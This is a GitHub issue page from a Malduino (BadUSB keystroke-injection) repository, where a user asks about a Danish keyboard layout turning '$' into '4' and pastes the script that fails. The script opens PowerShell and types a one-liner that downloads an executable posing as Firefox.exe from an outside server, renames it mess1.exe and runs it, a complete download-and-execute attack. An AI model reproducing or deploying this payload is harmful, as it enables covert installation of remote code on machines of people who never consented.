Seytonic / malduino

All the Malduinos!

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Problem with keyboard language

TermiTrack opened this issue · comments

I have some issues with the Danish keyboard language with the symbol ( $ ) probally others too.
I have read some of these issues on this page but could not find any solution for my problem.

I have a script which contains the symbol ( $ ) and when it's pressed by the Malduino it writes 4 instead of $.
I'm not sure why it's giving me issues cuz when i look into the code of the elite.ino it apperas to be supported.

If there is no way around this do anyone know a replacement for the symbol in this script:

REM Windows 10: Poweshell administrator download and execute file
DELAY 5000
GUI
DELAY 200
STRING Windows PowerShell
DELAY 200
ENTER
DELAY 3000
STRING $down = New-Object System.Net.WebClient; $url = 'https://srv-store6.dwn/download/FqiiSM/Firefox.exe'; $file = 'mess1.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;
DELAY 1000
ENTER